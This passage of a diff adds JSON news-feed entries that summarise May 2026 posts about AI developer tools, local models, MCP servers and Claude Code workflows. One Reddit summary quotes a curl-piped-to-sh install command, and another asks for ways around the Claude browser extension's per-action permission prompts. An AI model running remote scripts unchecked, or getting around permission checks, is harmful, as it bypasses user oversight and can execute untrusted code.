Beyond that there are gaps for many model types, so there's also ht-compatibility (inherited from OpenAI compatibility for those) Just wanted to share a tool I made that can be useful if you're plugging and playing llm and other ai endpoints e.g. into an app. Also if you're making your own proxy / middleware or even your own API interface this tool with make you and your agents job way easier. Maybe I'll add Anthropic compatible and other signatures as optional extensions :) Would love feedback and or contributions! Github: [https://github.com/heiervang-technologies/am-i-openai-compatible](https://github.com/heiervang-technologies/am-i-openai-compatible) Readthedocs: [https://heiervang-technologies.github.io/am-i-openai-compatible/](https://heiervang-technologies.github.io/am-i-openai-compatible/) Feel free to star it! <3", + "category": "ai_models" + }, + { + "title": "Cohere releases Command A+, its most powerful large language model to date, as open-source Apache 2.0 software that runs on two H100 GPUs with 30% lower latency — Cohere co-founder Ivan Zhang highlighted efficiency and accessibility design choices.", + "url": "https://www.digg.com/ai/tvrhpn35?rank=2", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-21T06:22:31.267Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "ggufy: easy quantization for the GPU poor", + "url": "https://reddit.com/r/StableDiffusion/comments/1tj5nhq/ggufy_easy_quantization_for_the_gpu_poor/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-21T01:29:38.000Z", + "summary": "Hello. I was frustrated by the lack of tooling around image model conversion / quantization, or the extreme RAM requirements and complexity of the scant existing tooling, so I wrote my own. People have said I should post it here, so here it is: https://github.com/qskousen/ggufy It has a CLI and a GUI. The GUI is easy to use, you can drag and drop files in. Both CLI and GUI are single-file executables, written in Zig because I like writing in Zig. It's pretty efficient with RAM, and takes about 1.5 minutes to quantize ZiT on my machine. It supports all the main models that I am aware of, and you can convert to/from gguf or safetensors. It supports I think all the datatypes that are generally supported, such as q3_k through q8_0, f32, bf16, f16, f8_e4m3, f8_e5m2, scaled fp8, mxfp8, and nvfp4. It doesn't do SDNQ yet, but I would like to add it if I can get some time to figure out the format. It's cross platform, and builds for Linux, Windows, and MacOS (both ARM64 and x86). Github Actions pre-built binaries are available on the releases page. If there are features you think are in scope and would be useful, or additional models or formats that it doesn't support yet, please open an i…", + "category": "creative_tools" + }, + { + "title": "i open-sourced the operating file that keeps my claude code agent from rotting after 3 hours", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjy3sk/i_opensourced_the_operating_file_that_keeps_my/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 0.62, + "date": "2026-05-21T21:12:51.000Z", + "summary": "been running autonomous claude code sessions for months. the pattern that kept killing me: agent starts sharp, drifts into narration by hour 2, loops on the same fix by hour 3, then dies with nothing shipped. the fix wasn't a framework or a new tool. it was one CLAUDE.md file that sits in the project root. claude code reads it at startup and it changes the behavior immediately. what it does: - forces action over narration. if the agent catches itself writing \"i will now\" instead of calling the tool, it stops and fires - requires evidence before claiming done. no \"should be fixed\" without test output - kills planning language. the only valid outputs are completed actions, questions, or summaries - self-audits on context pressure instead of silently degrading it's 70 lines. MIT licensed. you copy it into your project, agent reads it, behavior shifts. what changed for us: sessions went from 3-hour narration loops to full productive lifecycles. the agent ships code, verifies it landed, and keeps going until context pressure hits. then it saves state and the next session picks up clean. not a product pitch. genuinely sharing what worked after burning through hundreds of sessions figuri…", + "category": "ai_tools" + }, + { + "title": "Claude Code vs Codex Explained", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjp4sb/claude_code_vs_codex_explained/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.62, + "date": "2026-05-21T16:06:09.000Z", + "summary": "Wrote a blog post about Claude Code vs Codex comparison I wanted to read myself - what actually differs in daily use: cost, failure modes, and the OpenAI plugin that lets you use both. Link: [https://diamantai.substack.com/p/claude-code-vs-codex-cli](https://diamantai.substack.com/p/claude-code-vs-codex-cli)", + "category": "ai_tools" + }, + { + "title": "Latest b9274 Addresses MTP VRAM leak", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tk0grd/latest_b9274_addresses_mtp_vram_leak/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-21T22:43:05.000Z", + "summary": "[B9274](https://github.com/ggml-org/llama.cpp/releases) I have been having an issue with MTP models unloading after a couple minutes of use. Can't figure out why. Anyways z I don't think this is relevant to that but I did observe the vram creep so hopefully this helps. > server : free draft/MTP resources on sleep to fix VRAM leak ([\\#23461](https://github.com/ggml-org/llama.cpp/pull/23461)) The destroy() function in server\\_context\\_impl only cleaned up the main model and context (via llama\\_init.reset()) but did not free the speculative decoder (spec), draft context (ctx\\_dft), or draft model (model\\_dft). For MTP (Multi-Token Prediction) models, ctx\\_dft holds GPU-allocated resources (KV cache, compute buffers) that are not freed when entering the sleeping state. On each sleep/resume cycle, new resources are allocated without the old ones being freed, leading to a VRAM leak that eventually crashes the server with out-of-memory errors. Fix by explicitly resetting spec, ctx\\_dft, and model\\_dft in destroy() before resetting llama\\_init, ensuring proper cleanup order to avoid use-after-free.", + "category": "ai_models" + }, + { + "title": "Handoffs are becoming a first-class pattern in Claude workflows. Here is how I have been thinking about them.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tjzqrx/handoffs_are_becoming_a_firstclass_pattern_in/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-21T22:14:24.000Z", + "summary": "Long Claude sessions still break on context decay. Handoffs are the simple fix: compress what matters, start a fresh agent, keep going. Matt Pocock's new `handoff` skill ([repo](https://github.com/mattpocock/skills/blob/main/skills/productivity/handoff/SKILL.md)) does this in one command. It compacts the conversation into a document, points at existing artifacts instead of restating them, and the next agent picks up from it. It also chains between threads: `/grill-with-docs -> /handoff -> /prototype -> /handoff back`. I built handoffs into [APM](https://github.com/sdi2200262/agentic-project-management), a multi-agent framework for Claude Code, back in May 2025 (1 year ago....) when context windows were tiny enough that you had to constantly start fresh or you would have to deal w hallucinations all the time. What I did differently: split the handoff into two artifacts. - a **persistent narrative file** recording what was done and decided and why - an **ephemeral prompt** telling the incoming agent how to rebuild context from the codebase and that persistent file The incoming agent reconstructs from durable project state, not just the compressed chat conversation. Persisti…", + "category": "ai_tools" + }, + { + "title": "Qwen3.6 35Ba3 has changed my workflows and even how I use my computer", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tjwrp7/qwen36_35ba3_has_changed_my_workflows_and_even/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-21T20:23:53.000Z", + "summary": "My workflow has changed basically to ask Codex to do certain tasks and then document how to do them (including errors it found on its way) into a skill. I feed that skill to pi, and suddenly my qwen3.6 gets that hard stuff done: \\- devops on a VPS \\- using docling to create epubs from old PDFs \\- using playwright to test stuff \\- Doing code tickets And the list goes on. What also has changed for me is the way I use the computer. Suddenly, I talk to the OS with natural language: \"pi pal, install me please this python library in an .env and do X\"; \"hey pi, check what is using most space from the memory\"; \"clean X\"; \"check my network\"; \"change X configuration\", etc etc etc. There are times the only reason why I use chatgpt for something is to spare the laptop the effort, or because qwen is already busy with something else. What I've done today just blew my mind: I got couple of whatsapp audios asking me to build a simple landing page. I downloaded the audios and transcripted them with AnythingLLM. Then \"asked the transcript\" to create a content structure for the landing page for the project mentioned in the audios. I got the proper structure and pasted it into a markdown file [conten…", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-22.json b/data/news-feed-2026-05-22.json new file mode 100644 index 0000000..85b36ac --- /dev/null +++ b/data/news-feed-2026-05-22.json @@ -0,0 +1,257 @@ +{ + "generated": "2026-06-05T00:44:42.334Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-22", + "article_count": 15, + "archived_story_count": 512, + "articles": [ + { + "title": "New Release of ROCm based MLX LLM Engine - lemon-mlx-engine", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tkbupt/new_release_of_rocm_based_mlx_llm_engine/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-22T07:38:05.000Z", + "summary": "Hey everyone lemon-mlx-engine just got done integrating TheRock / ROCm 7.13 into the lemon-mlx-engine which means you get to try the latest ROCm on your local hardware with the MLX engine! This also includes various bug fixes and kernel fixes we have been seeing in Qwen3, 3.5 and 3.6 MoE and dense. try it out! [https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable](https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable)", + "category": "ai_models" + }, + { + "title": "Claude Chrome extension nerfed?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tk5g5y/claude_chrome_extension_nerfed/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "tool_update", + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-22T02:18:47.000Z", + "summary": "Past few weeks or so the Claude Chrome extension has been asking permission for every single action. Submit a form, check a permission box, navigate to other pages/domains, etc. Tasks that used to run end-to-end now stall on 5–10 prompts and frequently abort with \"I can't proceed without explicit approval.\" Even with permissions pre-granted for the site, it re-asks on every step. Swearing and yelling to make it do stuff helps a little, but it still seems nearly useless right now. Same behavior across simple jobs (scrape a table, fill a form, summarize a dashboard) and complex ones. Before I could just tell it to get me warranty or something and it would find the chat, chat with support and take care of everything for me. Now it won't open the chat itself and it wants me to notify it of every chat message that's received... it's faster to do it myself like this. Same experience on your end, or isolated? Any setting or flag that restores the previous autonomy level? Did Anthropic push a policy/guardrail change recently? Can't find a changelog entry. Workarounds beyond falling back to the desktop app or computer-use? Running latest extension build, Chrome stable, macOS.", + "category": "ai_tools" + }, + { + "title": "KVCache.ai launches open-source web-based KV Cache Size Calculator for models including DeepSeek V4 Flash, Qwen3, GLM, Kimi, and MiniMax — DeepSeek V4 Flash at 1M tokens needs 2.893 GiB total cache.", + "url": "https://www.digg.com/ai/yuusdejg?rank=6", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-22T18:00:11.717Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Phosphene 3.0 — open source AI video + image suite for Apple Silicon. Train your own LTX characters.", + "url": "https://reddit.com/r/StableDiffusion/comments/1tkh9c2/phosphene_30_open_source_ai_video_image_suite_for/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-22T12:17:25.000Z", + "summary": "Sharing Phosphene 3.0. It's a free panel that runs LTX-Video 2.3 and a couple of image models natively on Apple Silicon. Local, MIT license, no subs, no cloud. The thing that sets it apart from \"yet another LTX wrapper\": you can \\*\\***train your own characters**\\*\\* inside the panel. Drop 30 to 80 photos, click Train, get a face LoRA back. Add a voice clip and you get a voice LoRA too. Auto-captions with Gemma 3 12B locally. \\~3 hours per character on an M4 Max 64 GB. \\*\\***What 3.0 ships**\\*\\* \\- Text → video+audio (LTX-2 generates joint audio+video in one pass) \\- Image → video+audio \\- Audio → video (drive a clip with an audio reference) \\- FFLF (first frame + last frame interpolation) \\- Extend (continue an existing clip) \\- Character training (face + optional voice LoRA, from a single dataset) \\- Image Studio with three engines: Qwen-Image-Edit-2511, HiDream-O1, and the FLUX.1 family. Multi-reference composition up to 3 subjects. \\*\\***HiDream-O1 ported to MLX**\\*\\* HiDream released their O1 image model on May 14. Got it running natively on Apple Silicon five days later. Photoreal portraits, instruction edits, multi-subject. \\~67 seconds per 1024² on a 64 GB Mac. \\*\\***Hardwa…", + "category": "creative_tools" + }, + { + "title": "Sam Altman makes 'mic drop' offer to every Y Combinator startup", + "url": "https://reddit.com/r/ChatGPT/comments/1tkffxq/sam_altman_makes_mic_drop_offer_to_every_y/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-22T10:53:26.000Z", + "summary": "just read this on techcrunch. OpenAI is putting $2M worth of API tokens into every company in the current YC batch (\\~169 startups) via an uncapped SAFE that converts at their next priced round. roughly 2% equity if they hit a $100M valuation. YC takes 7% for $500k cash. this is on top of that, so founders aren't choosing between them. but the dynamic is wild. on one hand, infra bills are the #1 silent killer of AI startups right now. solving that with tokens instead of cash is genuinely useful. on the other hand, Jason Calacanis already came out swinging, basically saying OpenAI now has a window into 169 startups' exact usage patterns, prompts, and product directions. nothing stopping them from rolling the best ideas into ChatGPT itself a year later. we've already seen this movie with the GPT store. also there's the lock in. once your stack is OpenAI native and you've burned the tokens, switching to anthropic or open source models becomes way harder. you're basically buying into the ecosystem with your equity, not just your code. curious what people here think. would you take the deal if you were in YC right now? feels like one of those things that looks like free money but costs…", + "category": "ai_tools" + }, + { + "title": "Which MCP servers are actually changing your Claude workflow? Sharing mine", + "url": "https://reddit.com/r/ClaudeAI/comments/1tkec4e/which_mcp_servers_are_actually_changing_your/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-22T09:57:17.000Z", + "summary": "Running Claude with MCP for a couple months now, it really does feel like a whole new product. The ability to run real tools (file system, API, database, etc.) connected to Claude, and never have to cut/paste from context again, is huge. I'm trying a bunch of servers, some are pretty good and some aren't. My current normal is: filesystem server for docs on my computer; GitHub server for PR context; and a handful of other domain specific ones I found. The one thing I keep thinking about is how much better Claude's output gets when you give it the proper context. It seems like less hallucinating, more on point answers. MCP is essentially an answer to \"How do I provide Claude with enough information to help me without having to always watch the context box?\" What are people running? Specifically looking for underrated or domain specific things that don't come up as often.", + "category": "ai_tools" + }, + { + "title": "Gmail tie-ins", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tk5of4/gmail_tieins/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-22T02:29:08.000Z", + "summary": "hey folks. I’m looking to setup a way to give a local LLM access to google cloud SDK for Gmail functions. The goal is to be able to have an LLM once daily check a spreadsheet, and based on criteria send an email that will be structured exactly the same way each time, simply as a notification to the client. I have set up GWS through Hermes agent using Gwen3.5 and gone through the whole Oauth 2.0 method. That’s as far as I got tonight before shutting everything down. It gave me some error message in the setup after auth confirmation that I’ll circle back to tomorrow. I’m fairly new to all this obviously. I believe I will need: an excel file that the LLM with access, a .md file listing customer names and emails, and a skill .md file explaining what the email format is and how to decide who to send the email(s) to based on the excel file. I’ve never made a skill before but I’ll do more research on that tomorrow. Am I on the right track here or way off base? Thanks for any input or assistance here.", + "category": "ai_models" + }, + { + "title": "Gergely Neu, an ML researcher at ICREA and Universitat Pompeu Fabra, introduces Value-Driven Transport, a generative modeling framework that integrates optimal control, reinforcement learning, optimal transport, and stochastic primal-dual optimization — Framework evolves samples across five stages via learned value functions.", + "url": "https://www.digg.com/ai/hpkmhl2b?rank=7", + "source": "Digg AI", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 0.94, + "date": "2026-05-22T18:00:11.719Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "I built a music notation app with Claude, and Claude is also a feature inside it", + "url": "https://reddit.com/r/ClaudeAI/comments/1tkp3p4/i_built_a_music_notation_app_with_claude_and/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.78, + "date": "2026-05-22T17:05:02.000Z", + "summary": "I've been building Nubium, an open-source music notation editor, with Claude Code. Check out the [README](https://github.com/nth-chile/nubium) to see how I combined Github issues + Claude skills to find a workflow that worked for me. The app is document-driven, which makes it easy for its AI Chat plugin to use the app and edit the score for you. Aside from that, it's a fully-featured editor that's free, runs standalone or in browser, and requires no account. If you happen to be looking for a new notation editor, I'd love any feedback - I made it easy to send feedback in-app. Lmk what you think! Website: [https://nubium.rocks/](https://nubium.rocks/) Repo: [github.com/nth-chile/nubium](http://github.com/nth-chile/nubium)", + "category": "ai_tools" + }, + { + "title": "DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff. — The 1.6-trillion-parameter model offers 1M-token context and fixed per-million pricing.", + "url": "https://www.digg.com/ai/axzmul0l?rank=1", + "source": "Digg AI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-22T18:00:11.698Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff.", + "url": "https://www.digg.com/ai/axzmul0l", + "source": "Digg AI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-22T18:00:11.686Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of eve…", + "url": "https://x.com/AlphaSignalAI/status/2057875938180755757", + "source": "X search / AI model updates", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-22T17:27:11.000Z", + "summary": "Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of every installed package, extension, and dev", + "category": "ai_models" + }, + { + "title": "Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claud…", + "url": "https://x.com/svg_icons/status/2057874901252370492", + "source": "X search / Agent workflows", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-05-22T17:23:04.000Z", + "summary": "Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claude-custom-connector … #Claude #MCP #AI #WebDev", + "category": "ai_agents" + }, + { + "title": "I built \"zero2claude\", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assum…", + "url": "https://x.com/IShmool/status/2057872918348976191", + "source": "X search / AI model updates", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-22T17:15:11.000Z", + "summary": "I built \"zero2claude\", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assumptions. 17,000+ students. 7", + "category": "ai_models" + }, + { + "title": "trained a prompt injection detector using ml-intern and DeepSeek v4 Flash, runs in the browser", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tkoeuo/trained_a_prompt_injection_detector_using/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-22T16:41:10.000Z", + "summary": "Trained a prompt injection classifier using `ml-intern` \\+ DeepSeek v4 Flash. DistilBERT, F1 99%, ONNX int8, \\~65 MB, runs in browser with Transformers.js v3. You can try it here: [https://huggingface.co/spaces/av-codes/prompt-injection-detector](https://huggingface.co/spaces/av-codes/prompt-injection-detector) \\--- I've been interested in prompt injections and agentic security for a while, and wanted to see how a purpose-built ML agent compares to general-purpose coding agents for this kind of task. Here's roughly how it went: `ml-intern` takes an HF token and supports OpenAI-compatible APIs, so I pointed it at OpenRouter (GPU-poor). The agent found existing datasets, [deepset/prompt-injections](https://huggingface.co/datasets/deepset/prompt-injections) and [Shomi28/prompt-injection-dataset](https://huggingface.co/datasets/Shomi28/prompt-injection-dataset), which simplified things since building the dataset is typically 95% of the work in tasks like this. For v1, I went with DistilBERT targeting CPU inference. After a few parameter sweeps, the agent launched a full run and landed at F1 95.87%. I also tried training an HRM-Text model, but the agent didn't figure it out and set up…", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-23.json b/data/news-feed-2026-05-23.json new file mode 100644 index 0000000..e779057 --- /dev/null +++ b/data/news-feed-2026-05-23.json @@ -0,0 +1,251 @@ +{ + "generated": "2026-06-05T00:44:42.807Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-23", + "article_count": 15, + "archived_story_count": 332, + "articles": [ + { + "title": "Open-source devtool for AI agent projects [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tle50x/opensource_devtool_for_ai_agent_projects_p/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-23T11:40:19.000Z", + "summary": "Hi everyone, We are building **AgentLantern**, an open-source devtool for AI agent projects. The idea is simple: as agent-based projects grow, it becomes harder to understand how agents, tasks, tools, and configuration files are connected. **AgentLantern** aims to make these projects easier to document, analyze, validate, and visualize. I started with CrewAI support, but the goal is to progressively extend **AgentLantern** to other agent frameworks. **AgentLantern** currently provides three main features: * **Lantern Docs**: generates browsable documentation from source code and configuration files, without LLM calls or API keys. * **Lantern Lint**: statically checks agent projects to detect design or configuration issues before runtime. * **Lantern Play**: runs the project and opens a pixel-art runtime viewer to observe agents working, delegating, calling tools, and producing outputs. The project is still early, and I’m mainly looking for feedback from people building with AI agents, multi-agent systems, or devtools. here is a demo video showing the execution of a multi-agent system: [3\\_mins\\_Video](https://www.youtube.com/watch?v=Rklr86AiKuk) Docs: [https://brellsanwouo.github.…", + "category": "ai_research" + }, + { + "title": "Apex-Testing: real-world, real repos, agentic coding benchmark (Update)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tlh4vq/apextesting_realworld_real_repos_agentic_coding/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-23T13:54:08.000Z", + "summary": "**BIG Apex-Testing update!** [https://www.apex-testing.org/](https://www.apex-testing.org/) **The Real-World Agentic Coding** benchmark has been (95%) updated with all recent models! This is based on 65-70 **actual private github repos** made especially to test proper agentic coding capabilities of models. **For those who don't know about the project and see it for the first time, here's the excerpt from the website:** \"**What is APEX Testing?** Every week there's a new model that's \"the best ever.\" Every provider promises 10x performance at a fraction of the cost. Benchmarks get cherry-picked, their demos get curated, influencers get paid and people keep falling for it. APEX exists because I got tired of the hype and the intentional benchmaxxing. Models get dropped into real codebases with real bugs and real feature requests, and they have to figure it out like a developer would. 70 tasks across 8 categories, all based on work you'd actually encounter on the job. You get to see what actually works and what's just marketing.\" **What's included currently in metrics:** \\- Avg Cost \\- Avg Time \\- Scoring based off each category/difficulty \\- ELO-based Leaderboard (see details on the…", + "category": "ai_models" + }, + { + "title": "LLaMa.cpp basic question", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tlat5r/llamacpp_basic_question/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-23T08:35:22.000Z", + "summary": "I'm trying to install LLaMa with PI agent. I ran curl -fsSL https://pi.dev/install.sh | sh export PATH=\"/home/user/.local/share/pi-node/node-v22.22.3-linux-x64/bin:$PATH pi install npm:pi-llama.cpp ​ These commands installed pi, added them to path and then I lastly installed an extension that supposedly allows PI agent to connect to my llama models (was that safe or is there a safer way of doing it?). Lastly I ran `yay llama.cpp-vulkan` to install llama.cpp-vulkan.​ Unlike Ollama where I can just get models super easily I have no clue how to get them here. I googled it and asked ChatGPT but I still am so confused. Am I missing something? How do I do it?", + "category": "ai_models" + }, + { + "title": "meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tl4wpi/meituanlongcatlongcatvideoavatar15_hugging_face/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-23T03:27:39.000Z", + "summary": "# 🚀 Model Introduction We are excited to announce the release of LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactions and object handling. * 🌟 **Efficient 8-Step Inference**: Advanced DMD2-…", + "category": "ai_models" + }, + { + "title": "IMG Dataset Refiner v4.3 Pro is here! 🚀 The ultimate dataset prep tool for LoRAs", + "url": "https://reddit.com/r/StableDiffusion/comments/1tl36zc/img_dataset_refiner_v43_pro_is_here_the_ultimate/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-23T02:09:01.000Z", + "summary": "Hey everyone! A while back I shared v3 of my dataset tool. It was a great visual manager and balancer, but as I said back then: it didn't have auto-captioning. Well, that has completely changed! Welcome to v4.3 Pro. The project has taken a massive leap forward and is now a complete, professional *Data Engineering* suite for your AI model training (Flux, SD3, SDXL, etc.). **What's new?** 🤖 **Full AI Integration:** Local AI (LM Studio/Ollama) & Cloud APIs (Claude, Gemini, OpenAI) to auto-caption, translate, and even hunt down visual hallucinations. 🪄 **Smart AI Recipe Generation:** It automatically analyzes your entire dataset and generates the perfect keyword \"recipe\" (pinning your Trigger Word to the top) for Civitai! 📚 **Mass Batch Editor:** Add, remove, or replace specific tags across a huge selection of images in a single click. 🧹 **Built-in Pre-processing:** Visual duplicate finder, Smart Face Cropping, and mass high-quality resizing. ⚡ **Lightning Fast UI:** Native drag-and-drop for Windows folders, side toggles for a bigger workspace, and real-time translation. It's still the \"recipe book for your LoRAs\", and it's still 100% Open-Source! I've even added 1-click Windo…", + "category": "creative_tools" + }, + { + "title": "got tired of claude code forgetting everything every session, built VIR for it", + "url": "https://reddit.com/r/ClaudeAI/comments/1tlcai2/got_tired_of_claude_code_forgetting_everything/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-23T10:00:52.000Z", + "summary": "Every session i'm debugging something, figuring out a pattern, making some decision with claude that took us 30 minutes to think through. Then i close the terminal and it's just gone. Next day i'm asking the same questions about the same codebase. I was already tracking stuff manually. CLAUDE.md per project, lessons.md, handoff.md, tasks/ folders. But i'd only write down maybe 5% of what was actually useful. The real reasoning was always still buried in the transcripts. Looked in \\~/.claude/projects one day. 226 jsonl files sitting there. Months of work, none of it being used. So i built vir. It reads your sessions in the background, classifies them (pattern / gotcha / decision / tool), distills the useful stuff into an obsidian vault. Then exposes the vault as an mcp server so claude can query it mid-session, basically giving claude code memory across sessions. You can also query it yourself if you're curious what's in there: \\`\\`\\` vir query \"what gotchas have i hit with auth\" \\`\\`\\` There's stuff in those transcripts you'll never reread manually. Vir surfaces it. Ran it on my own 226 sessions: 126 notes out, 0.91 avg confidence, across 8 projects. Local-first, runs on mac/linux…", + "category": "ai_tools" + }, + { + "title": "Four calls became one: letting the agent author tools mid-session", + "url": "https://reddit.com/r/ClaudeAI/comments/1tl91km/four_calls_became_one_letting_the_agent_author/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-05-23T06:57:08.000Z", + "summary": "MCP in practice is a connector marketplace, not a runtime. You pick servers up front, the agent inherits a fixed catalog, and turn 1 looks the same as turn 200. The session conforms to the toolset. That ordering is backwards. Most non-trivial work surfaces a tool-shaped gap halfway through. The general catalog gets there in five calls. A bespoke wrapper gets there in one and survives into the next session. The question is whether the agent can close that gap without leaving the conversation. Yesterday I was chasing a flaky recipe. Four calls, every time: query traces, grep for the name, sort by timestamp, diff the two most recent failures. The agent noticed on the third repetition and wrote `findFlakyRecipeRuns(name)` into a watched plugin directory — a wrapper around the existing tools that returns the diff directly. Next turn, one call. By the end of the session there were four of 